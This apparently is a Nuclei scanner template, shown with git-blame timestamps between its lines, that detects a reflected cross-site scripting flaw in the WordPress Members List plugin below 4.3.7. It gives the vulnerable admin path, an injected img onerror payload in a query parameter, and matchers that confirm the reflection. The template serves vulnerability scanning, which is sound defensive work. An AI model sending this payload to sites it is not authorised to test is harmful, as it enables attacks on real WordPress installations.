2022-07-09 13:12:35 +00:00
id : members-list-xss
info :
2022-09-08 13:28:46 +00:00
name : WordPress Members List <4.3.7 - Cross-Site Scripting
2022-07-09 13:12:35 +00:00
author : Akincibor
severity : medium
2022-09-08 13:28:46 +00:00
description : WordPress Members List 4.3.7 does not sanitize and escape some parameters in various pages before outputting them back, leading to reflected cross-site scripting vulnerabilities.
2022-07-09 13:12:35 +00:00
reference :
- https://wpscan.com/vulnerability/d13f26f0-5d91-49d7-b514-1577d4247648
2022-09-08 13:28:46 +00:00
classification :
2023-03-03 15:27:54 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
cwe-id : CWE-80
2022-08-27 04:41:18 +00:00
tags : wp,wordpress,wp-plugin,xss,wpscan
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2022-07-09 13:12:35 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-07-09 13:12:35 +00:00
- method : GET
path :
- '{{BaseURL}}/wp-content/plugins/members-list/admin/view/user.php?page=%22%3E%3Cimg%20src%20onerror=alert(document.domain)%20x'
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"><img src onerror=alert(document.domain) x'
- "wrap tern-wrap"
condition : and
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-09-08 13:28:46 +00:00
# Enhanced by mp on 2022/09/07